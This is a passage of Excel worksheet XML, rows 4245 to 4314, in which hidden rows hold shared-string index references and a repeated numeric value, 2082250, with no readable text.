      <c r="C4245" t="s">
        <v>8546</v>
      </c>
      <c r="D4245" t="s">
        <v>8485</v>
      </c>
      <c r="E4245" t="s">
        <v>8423</v>
      </c>
      <c r="F4245" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4246" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4246" t="s">
        <v>8553</v>
      </c>
      <c r="B4246" t="s">
        <v>8420</v>
      </c>
      <c r="C4246" t="s">
        <v>8554</v>
      </c>
      <c r="D4246" t="s">
        <v>8476</v>
      </c>
      <c r="E4246" t="s">
        <v>8423</v>
      </c>
      <c r="F4246" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4247" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4247" t="s">
        <v>8557</v>
      </c>
      <c r="B4247" t="s">
        <v>8420</v>
      </c>
      <c r="C4247" t="s">
        <v>8558</v>
      </c>
      <c r="D4247" t="s">
        <v>8436</v>
      </c>
      <c r="E4247" t="s">
        <v>8423</v>
      </c>
      <c r="F4247" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4248" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4248" t="s">
        <v>8562</v>
      </c>
      <c r="B4248" t="s">
        <v>8420</v>
      </c>
      <c r="C4248" t="s">
        <v>8563</v>
      </c>
      <c r="D4248" t="s">
        <v>8564</v>
      </c>
      <c r="E4248" t="s">
        <v>8423</v>
      </c>
      <c r="F4248" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4249" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4249" t="s">
        <v>8565</v>
      </c>
      <c r="B4249" t="s">
        <v>8420</v>
      </c>
      <c r="C4249" t="s">
        <v>8566</v>
      </c>
      <c r="D4249" t="s">
        <v>8535</v>
      </c>
      <c r="E4249" t="s">
        <v>8423</v>
      </c>
      <c r="F4249" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4250" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4250" t="s">
        <v>8567</v>
      </c>
      <c r="B4250" t="s">
        <v>8420</v>
      </c>
      <c r="C4250" t="s">
        <v>8568</v>
      </c>
      <c r="D4250" t="s">
        <v>8517</v>
      </c>
      <c r="E4250" t="s">
        <v>8423</v>
      </c>
      <c r="F4250" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4251" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4251" t="s">
        <v>8572</v>
      </c>
      <c r="B4251" t="s">
        <v>8420</v>
      </c>
      <c r="C4251" t="s">
        <v>8573</v>
      </c>
      <c r="D4251" t="s">
        <v>8574</v>
      </c>
      <c r="E4251" t="s">
        <v>8423</v>
      </c>
      <c r="F4251" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4252" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4252" t="s">
        <v>7803</v>
      </c>
      <c r="B4252" t="s">
        <v>7804</v>
      </c>
      <c r="C4252" t="s">
        <v>1338</v>
      </c>
      <c r="D4252" t="s">
        <v>7805</v>
      </c>
      <c r="E4252" s="10">
        <v>2082250</v>
      </c>
      <c r="F4252" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4253" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4253" t="s">
        <v>7808</v>
      </c>
      <c r="B4253" t="s">
        <v>7804</v>
      </c>
      <c r="C4253" t="s">
        <v>1338</v>
      </c>
      <c r="D4253" t="s">
        <v>7809</v>
      </c>
      <c r="E4253" s="10">
        <v>2082250</v>
      </c>
      <c r="F4253" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4254" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4254" t="s">
        <v>8364</v>
      </c>
      <c r="B4254" t="s">
        <v>7804</v>
      </c>
      <c r="C4254" t="s">
        <v>1338</v>
      </c>
      <c r="D4254" t="s">
        <v>8365</v>
      </c>
      <c r="E4254" s="10">
        <v>2082250</v>
      </c>
      <c r="F4254" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4255" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4255" t="s">
        <v>8411</v>
      </c>
      <c r="B4255" t="s">
        <v>7804</v>
      </c>
      <c r="C4255" t="s">
        <v>1338</v>
      </c>
      <c r="D4255" t="s">
        <v>8412</v>
      </c>
      <c r="E4255" s="10">
        <v>2082250</v>
      </c>
      <c r="F4255" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4256" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4256" t="s">
        <v>8531</v>
      </c>
      <c r="B4256" t="s">
        <v>7804</v>
      </c>
      <c r="C4256" t="s">
        <v>1338</v>
      </c>
      <c r="D4256" t="s">
        <v>8532</v>
      </c>
      <c r="E4256" s="10">
        <v>2082250</v>
      </c>
      <c r="F4256" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4257" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4257" t="s">
        <v>8549</v>
      </c>
      <c r="B4257" t="s">
        <v>7804</v>
      </c>
      <c r="C4257" t="s">
        <v>1338</v>
      </c>
      <c r="D4257" t="s">
        <v>8550</v>
      </c>
      <c r="E4257" s="10">
        <v>2082250</v>
      </c>
      <c r="F4257" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4258" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4258" t="s">
        <v>8582</v>
      </c>
      <c r="B4258" t="s">
        <v>7804</v>
      </c>
      <c r="C4258" t="s">
        <v>1338</v>
      </c>
      <c r="D4258" t="s">
        <v>8583</v>
      </c>
      <c r="E4258" s="10">
        <v>2082250</v>
      </c>
      <c r="F4258" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4259" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4259" t="s">
        <v>8624</v>
      </c>
      <c r="B4259" t="s">
        <v>7804</v>
      </c>
      <c r="C4259" t="s">
        <v>1338</v>
      </c>
      <c r="D4259" t="s">
        <v>8625</v>
      </c>
      <c r="E4259" s="10">
        <v>2082250</v>
      </c>
      <c r="F4259" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4260" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4260" t="s">
        <v>9093</v>
      </c>
      <c r="B4260" t="s">
        <v>7804</v>
      </c>
      <c r="C4260" t="s">
        <v>1338</v>
      </c>
      <c r="D4260" t="s">
        <v>9094</v>
      </c>
      <c r="E4260" s="10">
        <v>2082250</v>
      </c>
      <c r="F4260" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4261" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4261" t="s">
        <v>9762</v>
      </c>
      <c r="B4261" t="s">
        <v>7804</v>
      </c>
      <c r="C4261" t="s">
        <v>1338</v>
      </c>
      <c r="D4261" t="s">
        <v>9263</v>
      </c>
      <c r="E4261" s="10">
        <v>2082250</v>
      </c>
      <c r="F4261" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4262" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4262" t="s">
        <v>9771</v>
      </c>
      <c r="B4262" t="s">
        <v>7804</v>
      </c>
      <c r="C4262" t="s">
        <v>1338</v>
      </c>
      <c r="D4262" t="s">
        <v>9261</v>
      </c>
      <c r="E4262" s="10">
        <v>2082250</v>
      </c>
      <c r="F4262" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4263" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4263" t="s">
        <v>9777</v>
      </c>
      <c r="B4263" t="s">
        <v>7804</v>
      </c>
      <c r="C4263" t="s">
        <v>1338</v>
      </c>
      <c r="D4263" t="s">
        <v>9285</v>
      </c>
      <c r="E4263" s="10">
        <v>2082250</v>
      </c>
      <c r="F4263" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4264" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4264" t="s">
        <v>9782</v>
      </c>
      <c r="B4264" t="s">
        <v>7804</v>
      </c>
      <c r="C4264" t="s">
        <v>1338</v>
      </c>
      <c r="D4264" t="s">
        <v>9293</v>
      </c>
      <c r="E4264" s="10">
        <v>2082250</v>
      </c>
      <c r="F4264" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4265" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4265" t="s">
        <v>9785</v>
      </c>
      <c r="B4265" t="s">
        <v>7804</v>
      </c>
      <c r="C4265" t="s">
        <v>1338</v>
      </c>
      <c r="D4265" t="s">
        <v>9275</v>
      </c>
      <c r="E4265" s="10">
        <v>2082250</v>
      </c>
      <c r="F4265" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4266" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4266" t="s">
        <v>9788</v>
      </c>
      <c r="B4266" t="s">
        <v>7804</v>
      </c>
      <c r="C4266" t="s">
        <v>1338</v>
      </c>
      <c r="D4266" t="s">
        <v>9277</v>
      </c>
      <c r="E4266" s="10">
        <v>2082250</v>
      </c>
      <c r="F4266" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4267" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4267" t="s">
        <v>9789</v>
      </c>
      <c r="B4267" t="s">
        <v>7804</v>
      </c>
      <c r="C4267" t="s">
        <v>1338</v>
      </c>
      <c r="D4267" t="s">
        <v>9281</v>
      </c>
      <c r="E4267" s="10">
        <v>2082250</v>
      </c>
      <c r="F4267" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4268" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4268" t="s">
        <v>9790</v>
      </c>
      <c r="B4268" t="s">
        <v>7804</v>
      </c>
      <c r="C4268" t="s">
        <v>1338</v>
      </c>
      <c r="D4268" t="s">
        <v>9303</v>
      </c>
      <c r="E4268" s="10">
        <v>2082250</v>
      </c>
      <c r="F4268" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4269" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4269" t="s">
        <v>9791</v>
      </c>
      <c r="B4269" t="s">
        <v>7804</v>
      </c>
      <c r="C4269" t="s">
        <v>1338</v>
      </c>
      <c r="D4269" t="s">
        <v>9287</v>
      </c>
      <c r="E4269" s="10">
        <v>2082250</v>
      </c>
      <c r="F4269" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4270" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4270" t="s">
        <v>9794</v>
      </c>
      <c r="B4270" t="s">
        <v>7804</v>
      </c>
      <c r="C4270" t="s">
        <v>1338</v>
      </c>
      <c r="D4270" t="s">
        <v>9289</v>
      </c>
      <c r="E4270" s="10">
        <v>2082250</v>
      </c>
      <c r="F4270" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4271" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4271" t="s">
        <v>9795</v>
      </c>
      <c r="B4271" t="s">
        <v>7804</v>
      </c>
      <c r="C4271" t="s">
        <v>1338</v>
      </c>
      <c r="D4271" t="s">
        <v>9291</v>
      </c>
      <c r="E4271" s="10">
        <v>2082250</v>
      </c>
      <c r="F4271" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4272" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4272" t="s">
        <v>9798</v>
      </c>
      <c r="B4272" t="s">
        <v>7804</v>
      </c>
      <c r="C4272" t="s">
        <v>1338</v>
      </c>
      <c r="D4272" t="s">
        <v>9315</v>
      </c>
      <c r="E4272" s="10">
        <v>2082250</v>
      </c>
      <c r="F4272" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4273" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4273" t="s">
        <v>9799</v>
      </c>
      <c r="B4273" t="s">
        <v>7804</v>
      </c>
      <c r="C4273" t="s">
        <v>1338</v>
      </c>
      <c r="D4273" t="s">
        <v>9295</v>
      </c>
      <c r="E4273" s="10">
        <v>2082250</v>
      </c>
      <c r="F4273" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4274" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4274" t="s">
        <v>9800</v>
      </c>
      <c r="B4274" t="s">
        <v>7804</v>
      </c>
      <c r="C4274" t="s">
        <v>1338</v>
      </c>
      <c r="D4274" t="s">
        <v>9297</v>
      </c>
      <c r="E4274" s="10">
        <v>2082250</v>
      </c>
      <c r="F4274" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4275" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4275" t="s">
        <v>9802</v>
      </c>
      <c r="B4275" t="s">
        <v>7804</v>
      </c>
      <c r="C4275" t="s">
        <v>1338</v>
      </c>
      <c r="D4275" t="s">
        <v>9299</v>
      </c>
      <c r="E4275" s="10">
        <v>2082250</v>
      </c>
      <c r="F4275" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4276" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4276" t="s">
        <v>9803</v>
      </c>
      <c r="B4276" t="s">
        <v>7804</v>
      </c>
      <c r="C4276" t="s">
        <v>1338</v>
      </c>
      <c r="D4276" t="s">
        <v>9317</v>
      </c>
      <c r="E4276" s="10">
        <v>2082250</v>
      </c>
      <c r="F4276" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4277" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4277" t="s">
        <v>9806</v>
      </c>
      <c r="B4277" t="s">
        <v>7804</v>
      </c>
      <c r="C4277" t="s">
        <v>1338</v>
      </c>
      <c r="D4277" t="s">
        <v>9320</v>
      </c>
      <c r="E4277" s="10">
        <v>2082250</v>
      </c>
      <c r="F4277" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4278" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4278" t="s">
        <v>9807</v>
      </c>
      <c r="B4278" t="s">
        <v>7804</v>
      </c>
      <c r="C4278" t="s">
        <v>1338</v>
      </c>
      <c r="D4278" t="s">
        <v>9322</v>
      </c>
      <c r="E4278" s="10">
        <v>2082250</v>
      </c>
      <c r="F4278" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4279" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4279" t="s">
        <v>9810</v>
      </c>
      <c r="B4279" t="s">
        <v>7804</v>
      </c>
      <c r="C4279" t="s">
        <v>1338</v>
      </c>
      <c r="D4279" t="s">
        <v>9326</v>
      </c>
      <c r="E4279" s="10">
        <v>2082250</v>
      </c>
      <c r="F4279" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4280" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4280" t="s">
        <v>9811</v>
      </c>
      <c r="B4280" t="s">
        <v>7804</v>
      </c>
      <c r="C4280" t="s">
        <v>1338</v>
      </c>
      <c r="D4280" t="s">
        <v>9328</v>
      </c>
      <c r="E4280" s="10">
        <v>2082250</v>
      </c>
      <c r="F4280" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4281" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4281" t="s">
        <v>9812</v>
      </c>
      <c r="B4281" t="s">
        <v>7804</v>
      </c>
      <c r="C4281" t="s">
        <v>1338</v>
      </c>
      <c r="D4281" t="s">
        <v>9330</v>
      </c>
      <c r="E4281" s="10">
        <v>2082250</v>
      </c>
      <c r="F4281" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4282" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4282" t="s">
        <v>9815</v>
      </c>
      <c r="B4282" t="s">
        <v>7804</v>
      </c>
      <c r="C4282" t="s">
        <v>1338</v>
      </c>
      <c r="D4282" t="s">
        <v>9333</v>
      </c>
      <c r="E4282" s="10">
        <v>2082250</v>
      </c>
      <c r="F4282" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4283" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4283" t="s">
        <v>9816</v>
      </c>
      <c r="B4283" t="s">
        <v>7804</v>
      </c>
      <c r="C4283" t="s">
        <v>1338</v>
      </c>
      <c r="D4283" t="s">
        <v>9335</v>
      </c>
      <c r="E4283" s="10">
        <v>2082250</v>
      </c>
      <c r="F4283" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4284" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4284" t="s">
        <v>9819</v>
      </c>
      <c r="B4284" t="s">
        <v>7804</v>
      </c>
      <c r="C4284" t="s">
        <v>1338</v>
      </c>
      <c r="D4284" t="s">
        <v>9339</v>
      </c>
      <c r="E4284" s="10">
        <v>2082250</v>
      </c>
      <c r="F4284" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4285" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4285" t="s">
        <v>9822</v>
      </c>
      <c r="B4285" t="s">
        <v>7804</v>
      </c>
      <c r="C4285" t="s">
        <v>1338</v>
      </c>
      <c r="D4285" t="s">
        <v>9341</v>
      </c>
      <c r="E4285" t="s">
        <v>9342</v>
      </c>
      <c r="F4285" t="s">
        <v>9343</v>
      </c>
    </row>
    <row r="4286" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4286" t="s">
        <v>9824</v>
      </c>
      <c r="B4286" t="s">
        <v>7804</v>
      </c>
      <c r="C4286" t="s">
        <v>1338</v>
      </c>
      <c r="D4286" t="s">
        <v>9347</v>
      </c>
      <c r="E4286" s="10">
        <v>2082250</v>
      </c>
      <c r="F4286" t="s">
        <v>9825</v>
      </c>
    </row>
    <row r="4287" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4287" t="s">
        <v>9826</v>
      </c>
      <c r="B4287" t="s">
        <v>7804</v>
      </c>
      <c r="C4287" t="s">
        <v>1338</v>
      </c>
      <c r="D4287" t="s">
        <v>9351</v>
      </c>
      <c r="E4287" s="10">
        <v>2082250</v>
      </c>
      <c r="F4287" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4288" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4288" t="s">
        <v>9836</v>
      </c>
      <c r="B4288" t="s">
        <v>7804</v>
      </c>
      <c r="C4288" t="s">
        <v>1338</v>
      </c>
      <c r="D4288" t="s">
        <v>9361</v>
      </c>
      <c r="E4288" s="10">
        <v>2082250</v>
      </c>
      <c r="F4288" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4289" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4289" t="s">
        <v>9837</v>
      </c>
      <c r="B4289" t="s">
        <v>7804</v>
      </c>
      <c r="C4289" t="s">
        <v>1338</v>
      </c>
      <c r="D4289" t="s">
        <v>9365</v>
      </c>
      <c r="E4289" s="10">
        <v>2082250</v>
      </c>
      <c r="F4289" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4290" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4290" t="s">
        <v>13029</v>
      </c>
      <c r="B4290" t="s">
        <v>7804</v>
      </c>
      <c r="C4290" t="s">
        <v>1338</v>
      </c>
      <c r="D4290" t="s">
        <v>9261</v>
      </c>
      <c r="E4290" s="10">
        <v>2082250</v>
      </c>
      <c r="F4290" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4291" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4291" t="s">
        <v>13030</v>
      </c>
      <c r="B4291" t="s">
        <v>7804</v>
      </c>
      <c r="C4291" t="s">
        <v>1338</v>
      </c>
      <c r="D4291" t="s">
        <v>9263</v>
      </c>
      <c r="E4291" s="10">
        <v>2082250</v>
      </c>
      <c r="F4291" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4292" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4292" t="s">
        <v>13059</v>
      </c>
      <c r="B4292" t="s">
        <v>7804</v>
      </c>
      <c r="C4292" t="s">
        <v>1338</v>
      </c>
      <c r="D4292" t="s">
        <v>9281</v>
      </c>
      <c r="E4292" s="10">
        <v>2082250</v>
      </c>
      <c r="F4292" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4293" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4293" t="s">
        <v>13060</v>
      </c>
      <c r="B4293" t="s">
        <v>7804</v>
      </c>
      <c r="C4293" t="s">
        <v>1338</v>
      </c>
      <c r="D4293" t="s">
        <v>9285</v>
      </c>
      <c r="E4293" s="10">
        <v>2082250</v>
      </c>
      <c r="F4293" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4294" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4294" t="s">
        <v>13165</v>
      </c>
      <c r="B4294" t="s">
        <v>7804</v>
      </c>
      <c r="C4294" t="s">
        <v>1338</v>
      </c>
      <c r="D4294" t="s">
        <v>9275</v>
      </c>
      <c r="E4294" s="10">
        <v>2082250</v>
      </c>
      <c r="F4294" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4295" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4295" t="s">
        <v>13166</v>
      </c>
      <c r="B4295" t="s">
        <v>7804</v>
      </c>
      <c r="C4295" t="s">
        <v>1338</v>
      </c>
      <c r="D4295" t="s">
        <v>9277</v>
      </c>
      <c r="E4295" s="10">
        <v>2082250</v>
      </c>
      <c r="F4295" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4296" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4296" t="s">
        <v>13171</v>
      </c>
      <c r="B4296" t="s">
        <v>7804</v>
      </c>
      <c r="C4296" t="s">
        <v>1338</v>
      </c>
      <c r="D4296" t="s">
        <v>9289</v>
      </c>
      <c r="E4296" s="10">
        <v>2082250</v>
      </c>
      <c r="F4296" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4297" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4297" t="s">
        <v>13172</v>
      </c>
      <c r="B4297" t="s">
        <v>7804</v>
      </c>
      <c r="C4297" t="s">
        <v>1338</v>
      </c>
      <c r="D4297" t="s">
        <v>9291</v>
      </c>
      <c r="E4297" s="10">
        <v>2082250</v>
      </c>
      <c r="F4297" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4298" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4298" t="s">
        <v>13175</v>
      </c>
      <c r="B4298" t="s">
        <v>7804</v>
      </c>
      <c r="C4298" t="s">
        <v>1338</v>
      </c>
      <c r="D4298" t="s">
        <v>9293</v>
      </c>
      <c r="E4298" s="10">
        <v>2082250</v>
      </c>
      <c r="F4298" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4299" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4299" t="s">
        <v>13176</v>
      </c>
      <c r="B4299" t="s">
        <v>7804</v>
      </c>
      <c r="C4299" t="s">
        <v>1338</v>
      </c>
      <c r="D4299" t="s">
        <v>9297</v>
      </c>
      <c r="E4299" s="10">
        <v>2082250</v>
      </c>
      <c r="F4299" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4300" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4300" t="s">
        <v>13177</v>
      </c>
      <c r="B4300" t="s">
        <v>7804</v>
      </c>
      <c r="C4300" t="s">
        <v>1338</v>
      </c>
      <c r="D4300" t="s">
        <v>9299</v>
      </c>
      <c r="E4300" s="10">
        <v>2082250</v>
      </c>
      <c r="F4300" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4301" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4301" t="s">
        <v>13178</v>
      </c>
      <c r="B4301" t="s">
        <v>7804</v>
      </c>
      <c r="C4301" t="s">
        <v>1338</v>
      </c>
      <c r="D4301" t="s">
        <v>9303</v>
      </c>
      <c r="E4301" s="10">
        <v>2082250</v>
      </c>
      <c r="F4301" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4302" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4302" t="s">
        <v>13179</v>
      </c>
      <c r="B4302" t="s">
        <v>7804</v>
      </c>
      <c r="C4302" t="s">
        <v>1338</v>
      </c>
      <c r="D4302" t="s">
        <v>9287</v>
      </c>
      <c r="E4302" s="10">
        <v>2082250</v>
      </c>
      <c r="F4302" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4303" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4303" t="s">
        <v>13180</v>
      </c>
      <c r="B4303" t="s">
        <v>7804</v>
      </c>
      <c r="C4303" t="s">
        <v>1338</v>
      </c>
      <c r="D4303" t="s">
        <v>9322</v>
      </c>
      <c r="E4303" s="10">
        <v>2082250</v>
      </c>
      <c r="F4303" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4304" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4304" t="s">
        <v>13181</v>
      </c>
      <c r="B4304" t="s">
        <v>7804</v>
      </c>
      <c r="C4304" t="s">
        <v>1338</v>
      </c>
      <c r="D4304" t="s">
        <v>9326</v>
      </c>
      <c r="E4304" s="10">
        <v>2082250</v>
      </c>
      <c r="F4304" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4305" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4305" t="s">
        <v>13182</v>
      </c>
      <c r="B4305" t="s">
        <v>7804</v>
      </c>
      <c r="C4305" t="s">
        <v>1338</v>
      </c>
      <c r="D4305" t="s">
        <v>9315</v>
      </c>
      <c r="E4305" s="10">
        <v>2082250</v>
      </c>
      <c r="F4305" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4306" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4306" t="s">
        <v>13185</v>
      </c>
      <c r="B4306" t="s">
        <v>7804</v>
      </c>
      <c r="C4306" t="s">
        <v>1338</v>
      </c>
      <c r="D4306" t="s">
        <v>9295</v>
      </c>
      <c r="E4306" s="10">
        <v>2082250</v>
      </c>
      <c r="F4306" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4307" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4307" t="s">
        <v>13186</v>
      </c>
      <c r="B4307" t="s">
        <v>7804</v>
      </c>
      <c r="C4307" t="s">
        <v>1338</v>
      </c>
      <c r="D4307" t="s">
        <v>9335</v>
      </c>
      <c r="E4307" s="10">
        <v>2082250</v>
      </c>
      <c r="F4307" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4308" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4308" t="s">
        <v>13187</v>
      </c>
      <c r="B4308" t="s">
        <v>7804</v>
      </c>
      <c r="C4308" t="s">
        <v>1338</v>
      </c>
      <c r="D4308" t="s">
        <v>9317</v>
      </c>
      <c r="E4308" s="10">
        <v>2082250</v>
      </c>
      <c r="F4308" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4309" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4309" t="s">
        <v>13188</v>
      </c>
      <c r="B4309" t="s">
        <v>7804</v>
      </c>
      <c r="C4309" t="s">
        <v>1338</v>
      </c>
      <c r="D4309" t="s">
        <v>9320</v>
      </c>
      <c r="E4309" s="10">
        <v>2082250</v>
      </c>
      <c r="F4309" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4310" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4310" t="s">
        <v>13189</v>
      </c>
      <c r="B4310" t="s">
        <v>7804</v>
      </c>
      <c r="C4310" t="s">
        <v>1338</v>
      </c>
      <c r="D4310" t="s">
        <v>9351</v>
      </c>
      <c r="E4310" s="10">
        <v>2082250</v>
      </c>
      <c r="F4310" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4311" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4311" t="s">
        <v>13190</v>
      </c>
      <c r="B4311" t="s">
        <v>7804</v>
      </c>
      <c r="C4311" t="s">
        <v>1338</v>
      </c>
      <c r="D4311" t="s">
        <v>9328</v>
      </c>
      <c r="E4311" s="10">
        <v>2082250</v>
      </c>
      <c r="F4311" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4312" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4312" t="s">
        <v>13191</v>
      </c>
      <c r="B4312" t="s">
        <v>7804</v>
      </c>
      <c r="C4312" t="s">
        <v>1338</v>
      </c>
      <c r="D4312" t="s">
        <v>9330</v>
      </c>
      <c r="E4312" s="10">
        <v>2082250</v>
      </c>
      <c r="F4312" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4313" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4313" t="s">
        <v>13192</v>
      </c>
      <c r="B4313" t="s">
        <v>7804</v>
      </c>
      <c r="C4313" t="s">
        <v>1338</v>
      </c>
      <c r="D4313" t="s">
        <v>9333</v>
      </c>
      <c r="E4313" s="10">
        <v>2082250</v>
      </c>
      <c r="F4313" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="4314" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
      <c r="A4314" t="s">
        <v>13193</v>
      </c>
      <c r="B4314" t="s">
        <v>7804</v>
      </c>
      <c r="C4314" t="s">
        <v>1338</v>
      </c>
